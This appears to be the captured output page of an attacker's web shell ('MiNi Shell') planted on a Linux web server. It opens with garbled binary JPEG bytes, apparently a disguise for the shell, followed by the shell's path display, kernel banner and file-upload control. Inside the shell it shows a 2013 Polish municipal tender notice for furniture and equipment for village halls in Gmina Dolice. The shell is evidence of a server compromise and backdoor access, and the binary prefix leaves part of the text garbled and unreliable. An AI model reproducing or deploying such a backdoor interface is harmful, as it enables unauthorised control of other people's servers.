JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/397832-N-2013.html

<p class="kh_header"><b>Dolice: Dostawa mebli i wyposażenia do świetlic w miejscowości Bralęcin i Przewłoki</b><br>
<b>Numer ogłoszenia: 397832 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dolice , ul. Ogrodowa 16, 73-115 Dolice, woj. zachodniopomorskie, tel. 091 5640129, faks 091 5640237.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli i wyposażenia do świetlic w miejscowości Bralęcin i Przewłoki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wyposażenia do świetlic wiejskich w miejscowościach Bralęcin i Przewłoki w gminie Dolice obejmująca:
a) Bralęcin część 1 
- stół świetlicowy 80x120 cm						- szt. 15
- stół świetlicowy 80x80 cm						- szt. 5
- krzesło wyściełane							- szt. 80
- biurko komputerowe							- szt. 4
- zestaw komputerowy z oprogramowaniem			- szt. 4
- krzesło obrotowe							- szt. 5
- biurko									- szt. 1
- rzutnik multimedialny							- szt. 1
- ekran projekcyjny							- szt. 1
- urządzenie wielofunkcyjne (skaner, kopiarka, drukarka)	- szt. 1
- telewizor									- szt. 1
- urządzenie DVD (recorder)						- szt. 1
- wieszak ścienny TV							- szt. 1
- zestaw muzyczny (tuner, odtwarzacz CD)			- szt. 1
- zestaw nagłaśniający wzmacniacz					- szt. 1
- kolumny głośnikowe							- szt. 4
- mikrofony bezprzewodowe ze statywami				- szt. 3
- szafka RTV								- szt. 1
- wieszak ubraniowy stojący						- szt. 8
- regał magazynowy							- szt. 4
- zestaw mebli kuchennych						- szt. 1
- kuchnia elektryczna z piekarnikiem					- szt. 1
- kuchenka mikrofalowa							- szt. 1
- warnik do wrzątku							- szt. 1
- tablica korkowa								- szt. 6
- ławka zewnętrzna							- szt. 2
- kosz na odpady wewnętrzny					- szt. 8
- kosz na odpady zewnętrzny						- szt. 2
- pojemnik na papier toaletowy					- szt. 4
- pojemnik na mydło w płynie						- szt. 4
- pojemnik na ręczniki papierowe					- szt. 4
- kosz na zużyte ręczniki 						- szt. 4
- żaluzje okienne zwijane(okiennice)					- m2 7,08
- żaluzje okienne zwijane(okiennice)					- m2 19,47
- tablica suchościeralna							- szt. 1
- szafa biurowa								- szt. 1
- szafa ubraniowa								- szt. 1
b) Przewłoki część 2
- stół świetlicowy 180x80 cm						- szt. 20
- krzesło wyściełane							- szt. 100
- biurko komputerowe							- szt. 7
- zestaw komputerowy z oprogramowaniem			- szt. 7
- krzesło obrotowe							- szt. 7
- rzutnik multimedialny							- szt. 1
- ekran projekcyjny							- szt. 1
- urządzenie wielofunkcyjne (skaner, kopiarka, drukarka)	- szt. 1
- szafka pod telewizor							- szt. 1
- szafa									- szt. 2
- telewizor									- szt. 1
- odtwarzacz DVD (recorder)						- szt. 1
- zestaw muzyczny							- szt. 1
- szafa pod wymiar do przechowywania sprzętu RTV		- szt. 1
- wieszak ubraniowy stojący						- szt. 2
- wieszak szatniowy ścienny						- szt. 10
- ławka szatniowa jednostronna z wieszakiem			- szt. 10
- regał magazynowy							- szt. 4
- zestaw mebli kuchennych						- szt. 1
- kuchnia gazowo-elektryczna z piekarnikiem			- szt. 1
- zmywarka									- szt. 1
- kuchenka mikrofalowa							- szt. 1
- warnik do wrzątku							- szt. 2
- szafka pod zlewozmywak						- szt. 1
- szafka wolnostojąca kuchenna					- szt. 1
- tablica suchościeralna							- szt. 1
- ławka zewnętrzna							- szt. 4
- kosz na odpady wewnętrzny					- szt. 15
- kosz na odpady zewnętrzny						- szt. 2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.14.10.00-2, 39.71.00.00-2, 32.30.00.00-6, 32.34.00.00-8, 30.21.30.00-5, 48.00.00.00-8, 44.22.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga od wykonawców wniesienia wadium kwocie 2500,00 zł w zakresie dotyczącym łącznie części 1 i 2 zamówienia lub w kwocie 1250,00 zł w zakresie dotyczącym tylko części 1 lub 2 zamówienia w terminie wyznaczonym na składanie ofert (9 październik 2013r. do godz.10.00).
2. W zależności od woli wykonawcy wadium może być wnoszone w formach:
-	pieniądza,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z 9.11.2000 r. o utworzeniu PARP (tekst jednolity Dz.U. z 2007r Nr 42, poz. 275).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego w Pyrzycko-Stargardzkim Banku Spółdzielczym oddział Dolice 
Nr 78 9387 1026 2600 0358 2000 0030.
Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu załączona do oferty. Wadium uznaje się za wniesione w terminie jeżeli do terminu wyznaczonego na wniesienie wadium środki będą znajdowały się na wyżej wskazanym rachunku Zamawiającego.
4. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
6. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1)  wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
2) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8. Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie wykonawcy przez zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana zgodnie z formułą spełnia - nie
spełnia, na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w rozdziale VI pkt 1 SIWZ - załącznik nr 4 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana zgodnie z formułą spełnia - nie
spełnia, na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w rozdziale VI pkt 1 SIWZ - załącznik nr 4 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana zgodnie z formułą spełnia - nie
spełnia, na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w rozdziale VI pkt 1 SIWZ - załącznik nr 4 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana zgodnie z formułą spełnia - nie
spełnia, na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w rozdziale VI pkt 1 SIWZ - załącznik nr 4 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana zgodnie z formułą spełnia - nie
spełnia, na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w rozdziale VI pkt 1 SIWZ - załącznik nr 4 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ewentualne pełnomocnictwa 2. Pisemne zobowiązania podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość następujących zmian postanowień zawartej umowy:
1) przesunięcie terminu realizacji umowy w przypadku wystąpienia okoliczności, których nie można było przewidzieć pomimo zachowania należytej staranności,
2) przesunięcie terminu realizacji umowy w przypadku działania siły wyższej (np. klęski żywiołowe, strajki), mającej bezpośredni wpływ na terminowość wykonania przedmiotu umowy,
3) ustawowa zmiana stawki podatku VAT,
W przypadku wystąpienia okoliczności określonych w pkt 1 - 2 zostanie ustalony nowy termin realizacji, z tym że okres przesunięcia terminu wykonania równy będzie okresowi, w którym wykonanie dostawy nie było możliwe.
W przypadku wystąpienia okoliczności określonych w pkt 3) wartość wynagrodzenia za przedmiot umowy zostanie odpowiednio zmieniona.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dolice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dolice, ul. Ogrodowa 16, 73-115 Dolice pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2013 godzina 10:00, miejsce: Urząd Gminy Dolice, ul. Ogrodowa 16, 73-115 Dolice pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Rolnego w ramach Programu Rozwoju Obszarów Wiejskich na 2007 - 2013 Działanie: 313, 322, 323 Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa wyposażenia do świetlicy wiejskiej w miejscowości Bralęcin w gminie Dolice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa wyposażenia do świetlicy wiejskiej w miejscowości Bralęcin w gminie Dolice. obejmująca: stół świetlicowy 80x120 cm- szt. 15, stół świetlicowy 80x80 cm- szt. 5, krzesło wyściełane szt. 80, biurko komputerowe szt. 4, zestaw komputerowy z oprogramowaniem szt. 4, krzesło obrotowe szt. 5, biurko szt. 1, rzutnik multimedialny szt. 1, ekran projekcyjny szt. 1, urządzenie wielofunkcyjne (skaner, kopiarka, drukarka) szt. 1, telewizor szt. 1, urządzenie DVD (recorder) szt. 1, wieszak ścienny TV szt. 1, zestaw muzyczny (tuner, odtwarzacz CD) szt. 1, zestaw nagłaśniający wzmacniacz szt. 1, kolumny głośnikowe szt. 4, mikrofony bezprzewodowe ze statywami szt. 3, szafka RTV szt. 1, wieszak ubraniowy stojący szt. 8, regał magazynowy szt. 4, zestaw mebli kuchennych szt. 1, kuchnia elektryczna z piekarnikiem szt. 1, kuchenka mikrofalowa szt. 1, warnik do wrzątku szt. 1, tablica korkowa szt. 6, ławka zewnętrzna szt. 2, kosz na odpady wewnętrzny szt. 8, kosz na odpady zewnętrzny szt. 2, pojemnik na papier toaletowy szt. 4, pojemnik na mydło w płynie szt. 4, pojemnik na ręczniki papierowe szt. 4, kosz na zużyte ręczniki szt. 4, żaluzje okienne zwijane(okiennice) m2 7,08, żaluzje okienne zwijane(okiennice) m2 19,47, tablica suchościeralna	 szt. 1, szafa biurowa szt. 1, szafa ubraniowa szt. 1.Szczegółowy opis części 1 zamówienia zawiera specyfikacja techniczna załącznik nr 1/1 do niniejszej specyfikacji istotnych warunków zamówienia,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.14.10.00-2, 39.71.00.00-2, 32.30.00.00-6, 32.34.00.00-8, 30.21.30.00-5, 48.00.00.00-8, 44.22.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa wyposażenia do świetlicy wiejskiej w miejscowościach Przewłoki w gminie Dolice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stół świetlicowy 180x80 cm szt. 20, krzesło wyściełane szt. 100, biurko komputerowe szt. 7, zestaw komputerowy z oprogramowaniem szt. 7, krzesło obrotowe szt. 7, rzutnik multimedialny szt. 1, ekran projekcyjny szt. 1, urządzenie wielofunkcyjne  skaner, kopiarka, drukarka) szt. 1, szafka pod telewizor szt. 1, szafa szt. 2, telewizor szt. 1, odtwarzacz DVD (recorder) szt. 1, zestaw muzyczny szt. 1, szafa pod wymiar do przechowywania sprzętu RTV szt. 1, wieszak ubraniowy stojący szt. 2, wieszak szatniowy ścienny szt. 10, ławka szatniowa jednostronna z wieszakiem szt. 10, regał magazynowy szt. 4, zestaw mebli kuchennych szt. 1, kuchnia gazowo-elektryczna z piekarnikiem szt. 1, zmywarka szt. 1, kuchenka mikrofalowa	szt. 1, warnik do wrzątku szt. 2, szafka pod zlewozmywak szt. 1, szafka wolnostojąca kuchenna szt. 1, tablica suchościeralna szt. 1, ławka zewnętrzna szt. 4, kosz na odpady wewnętrzny szt. 15, kosz na odpady zewnętrzny szt. 2,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 48.00.00.00-8, 39.15.00.00-8, 39.14.10.00-2, 39.71.00.00-2, 32.30.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com